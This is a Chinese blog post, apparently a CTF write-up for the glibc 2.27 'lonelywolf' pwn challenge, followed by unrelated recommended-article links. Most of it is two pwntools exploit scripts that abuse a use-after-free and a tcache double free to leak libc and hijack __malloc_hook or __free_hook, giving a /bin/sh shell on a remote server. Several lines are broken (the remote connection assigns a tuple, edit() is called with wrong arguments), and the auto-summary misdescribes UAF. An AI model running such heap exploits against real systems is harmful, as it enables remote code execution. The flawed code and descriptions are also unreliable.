lonewolf

最新推荐文章于 2022-05-19 14:19:36 发布
最新推荐文章于 2022-05-19 14:19:36 发布
阅读量1k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyvle/article/details/116849783
版权
该博客详细介绍了如何利用2.27版本的未初始化指针引用(UAF)漏洞进行堆溢出,并通过double free技巧绕过额外检查,最终实现对`__malloc_hook`的劫持,从而控制程序流程。通过泄露libc基地址和利用gadgets,博主展示了如何构造payload以执行自定义代码,如执行`/bin/sh`来获取shell。
摘要由CSDN通过智能技术生成

在这里插入图片描述

原来是一个uaf,真不戳,还有一个show函数,也就是说我们可以泄露libc基值,但是因为申请的chunk大小受限,不能申请到大小为unsorted bin的堆,但是我们可以double free,但现在2.27比之前要多了检查,我们要修改一下,如何可以快乐的df了,劫持free_hook,得到flag

from pwn import *
context.update(terminal=['tmux','splitw','-h'])
elf=ELF("./lonelywolf")
p=remote=("124.70.38.80",22175)
libc = ELF('./libc-2.27.so')
gadget=[0x4f3d5,0x4f432,0x10a41c]
def add(size): 
    p.recvuntil("Your choice: ")
    p.sendline("1")
    p.recvuntil("Index: ")
    p.sendline('0')
    p.recvuntil("Size: ")
    p.sendline(str(size))


def free():
    p.recvuntil("Your choice: ")
    p.sendline("4")
    p.recvuntil("Index: ")
    p.sendline('0')


def edit(idx,content):
    p.recvuntil('Your choice: ')
    p.sendline('2')
    p.recvuntil('Index: ')
    p.sendline(str(idx))
    p.recvuntil('Content: ')
    p.sendline(content)

def show():
    p.recvuntil("Your choice: ")
    p.sendline(3)
    p.recvuntil("Index: ")
    p.sendline('0')
    p.recvuntil("Content: ")

add(0x70)
free()
edit(0,'aaaa')
free()
show()
heap_addr=u64(p.recv(6).ljust(8,'\x00'))+0x20
edit(p64(heap_addr+0x10))
add(0x70)
add(0x70)
edit('\x07'*0x40)
free()
show()
libc_base =  u64( p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3ebca0
malloc_hook=libc_base+libc.sym['__malloc_hook']
oneget=gadget[2]+libc_base
add(0x70)
free()
edit(0,'aaaa')
free()
edit(0,p64(malloc_hook))
add(0x70)
add(0x70)
edit(0,p64(oneget))
add(0x10)
p.interactive()

一个2.27的uaf漏洞,可以通过df来进行泄露,可以选择劫持程序流

from pwn import *
context.terminal=["gnome-terminal",'-x','sh','-c']
p=remote=("")
libc = ELF('./libc-2.27.so')

def add(size): 
    p.recvuntil("Your choice: ")
    p.sendline("1")
    p.recvuntil("Index: ")
    p.sendline('0')
    p.recvuntil("Size: ")
    p.sendline(str(size))


def delete():
    p.recvuntil("Your choice: ")
    p.sendline("4")
    p.recvuntil("Index: ")
    p.sendline('0')


def edit(c="a"):
    p.recvuntil("Your choice: ")
    p.sendline("2")
    p.recvuntil("Index: ")
    p.sendline('0')
    p.recvuntil("Content: " )  
    p.sendline(c)  

def show():
    p.recvuntil("Your choice: ")
    p.sendline(3)
    p.recvuntil("Index: ")
    p.sendline('0')
    p.recvuntil("Content: ")

add(0x70)
delete()
edit(p64(0)+'a')
delete()
show()
heap_addr=u64(p.recv(6)+'\x00'*2)-0x260
edit(p64(heap_addr+0x10))
add(0x70)
add(0x70)
edit('\x07'*0x40)
delete()
show()
libc_base =  u64( p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3ebca0
free_hook=libc_base+libc.sym['__free_hook']
sys_addr=libc_base+libc.sym['system']
edit('\x01'*0x40+p64(free_hook-8))
add(0x10)
edit('/bin/sh\x00'+p64(sys_addr))
delete()
p.interactive()
w0nderMaker
关注
《高等学校研究生英语系列教材 综合教程 上》期末复习题,看这一篇就够了!!!!
帅小柏的博客
09-28 1707
Your job as a future employee is to help the hiring manager mitigate that risk.You need to help them identify you as a prospective “key player"Kelly was outstanding and outshone every other player on the field.Better still, develop a reputation inside your
Lone Wolf PalmOS Reader-开源
06-29
Lone Wolf PalmOS Reader-开源》是一款专为Joe Dever的Lone Wolf系列书籍设计的掌上阅读器和角色管理应用,适用于PalmOS操作系统。这个项目由Project Aon发起,旨在为爱好者们提供一个免费且开放源代码的阅读解决...
ciscn2021 pwn-lonelywolf
z1r0的博客
05-19 234
ciscn2021 pwn-lonelywolf 简单题 保护全开 有一个很明显的uaf漏洞 add还限制了大小 攻击思路:利用tcache struct attack来解决这一道题目,申请到tcache struct这里之后有两种方法来得到unsortedbin的块。 第一种是对struct进行绕过并释放,第二种是将申请的堆块伪造成0x91并释放。这里选择第二种。 因为tcache第一个bin满7个接下来就会fastbin或者进入其他的bin。所以我们改里面的0x91对应的counts为7,再利用ua
Manjaro 安装屏幕录制软件 Kazam
qq_37280924的博客
07-31 2156
Manjaro 版本:Manjaro 20.0.3 Lysia GNOME 3.36.4 网上搜索时找到了 Linux 下的 包下载网站 这个网址可以看到 Kazam 所有Linux的安装方式:Kazam Download for Linux (deb, rpm, zst) 因为 Manjaro 是 Arch 衍生版本,所以我们点击 上图中的 kazam-1.4.5-9-any.pkg.tar.zst 鼠标滚轮向下滚动到 Install Howto 这个位置,可以看到上边有说明如何安装: 我们跳转到.
LoadRunner的中文乱码解决方法
心在天涯----测试之路
07-19 7978
LoadRunner的中文乱码存在以下两个方面。需要根据实际情况有针对性的去解决: 1、录制的脚本中存在中文乱码 该问题是很多LoadRunner初学者碰到的问题,网上也有很多的解决方法,这里就简单的列举下解决方法: A、修改Virtual User Gen的脚本编码格式,路径(Tools->Recoding Options -> Advanced -> Support charset -
Android volley 使用OkHttp3.0
西涛offbye-移动全栈技术博客
03-31 2355
本文仅介绍如何使用OKHttp3.0实现HttpStack,从而接管volley的网络请求。前言:volley ---- Google出品的android平台轻量级网络库          优点:扩展性强,请求队列管理     基本介绍:http://blog.csdn.net/t12x3456/article/details/9221611/     github镜像: https://gith
数据库连接池
CleverCats的博客
03-26 184
一、应用程序直接获取数据库连接的缺点 用户每次请求都需要向数据库获得链接,而数据库创建连接通常需要消耗相对较大的资源,创建时间也较长。假设网站一天10万访问量,数据库服务器就需要创建10万次连接,极大的浪费数据库的资源,并且极易造成数据库服务器内存溢出、拓机。如下图所示: 二、使用数据库连接池优化程序性能 2.1、数据库连接池的基本概念 数据库连接是一种关键的有限的昂贵的资源,这一点在多...
几种常用数据库连接池的使用
热门推荐
qq_36528311的博客
02-14 4万+
  一、应用程序直接获取数据库连接的缺点   用户每次请求都需要向数据库获得链接,而数据库创建连接通常需要消耗相对较大的资源,创建时间也较长。假设网站一天10万访问量,数据库服务器就需要创建10万次连接,极大的浪费数据库的资源,并且极易造成数据库服务器内存溢出、拓机。如下图所示:    二、使用数据库连接池优化程序性能 2.1、数据库连接池的基本概念   数据库连接是一种关键的有限的昂...
silverwolf
wuyvle的博客
07-18 1281
这个题和看起来像lonewolf,但有沙盒规则,题目给了flag的位置,很显然是用orw来做题,我们先泄露出libc基值,rop中我们注入gadget来进行栈迁移,我们这里利用利用 setcontext 来控制rsp from pwn import * context.update(terminal=['tmux','splitw','-h']) p=process('./silverwolf') elf=ELF('./libc-2.27.so') def add(idx,size): p.rec
What to know about the gr IoT Kommunikation owing wolf population debate in Germany
iam1515的博客
02-23 652
www.inhandnetworks.de After over a century and a half of extinction, wolves are back in Germany and multiplying quickly. But who exactly is affected by this growth and does it pose a threat to humans?...
Lone Wolf-crx插件
04-02
语言:English (United States) 他们不是孤独的狼,他们是白人恐怖分子 厌倦了种族主义记者将每个拿着枪的棕色人标记为“恐怖分子”,而每个拿着枪的白人则标记为“孤独的狼”? 让我们解决该故障。
独狼「Lone Wolf」-crx插件
03-09
他们不是孤独的狼,他们是白人的恐怖分子 厌倦了种族主义新闻工作者把每一个棕色的人用枪labeling为“恐怖分子”,而每一个拿着枪作为“孤独的狼”的白人呢?让我们来修复这个故障。 支持语言:English (United ...
MFC窗口程序添加bmp图片
07-04
添加头文件:lonewolf_mm.h 名字取个你喜欢的 把下面的代码拷进去,没关系,编程一开始都是抄别人的 : ) /****************************************************************************** * File Name : lonewolf...
LDJAM46
02-20
"Jam"模式允许团队合作,而"Lone Wolf"模式则要求单人完成所有工作。参与者的成果会在活动结束后展示并接受公众评审。 【描述】"LDJAM46"的描述没有提供具体的信息,但我们可以推测这可能是指参赛者在该活动中创作...
基于java的贝儿米幼儿教育管理系统答辩PPT.pptx
11-04
基于java的贝儿米幼儿教育管理系统答辩PPT.pptx
课设毕设基于SpringBoot+Vue的养老院管理系统的设计与实现源码可运行.zip
11-04
本压缩包资源说明,你现在往下拉可以看到压缩包内容目录 我是批量上传的基于SpringBoot+Vue的项目,所以描述都一样;有源码有数据库脚本,系统都是测试过可运行的,看文件名即可区分项目~ |Java|SpringBoot|Vue|前后端分离| 开发语言:Java 框架:SpringBoot,Vue JDK版本:JDK1.8 数据库:MySQL 5.7+(推荐5.7,8.0也可以) 数据库工具:Navicat 开发软件: idea/eclipse(推荐idea) Maven包:Maven3.3.9+ 系统环境:Windows/Mac
基于java的消防物资存储系统答辩PPT.pptx
11-04
基于java的消防物资存储系统答辩PPT.pptx
【java毕业设计】饮食营养管理信息系统源码(springboot+vue+mysql+说明文档).zip
11-04
项目经过测试均可完美运行! 环境说明: 开发语言:java jdk:jdk1.8 数据库:mysql 5.7+ 数据库工具:Navicat11+ 管理工具:maven 开发工具:idea/eclipse
【java毕业设计】酷听音乐源码(springboot+vue+mysql+说明文档).zip
11-04
项目经过测试均可完美运行! 环境说明: 开发语言:java jdk:jdk1.8 数据库:mysql 5.7+ 数据库工具:Navicat11+ 管理工具:maven 开发工具:idea/eclipse
TA_Lib轮子无需编译-TA_Lib-0.4.19-cp38-cp38-linux_armv7l.whl.zip
最新发布
11-04
TA_lib库(whl轮子),直接pip install安装即可,下载即用,非常方便,各个python版本对应的都有。 使用方法: 1、下载下来解压; 2、确保有python环境,命令行进入终端,cd到whl存放的目录,直接输入pip install TA_lib-xxxx.whl就可以安装,等待安装成功,即可使用! 优点:无需C++环境编译,下载即用,方便
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值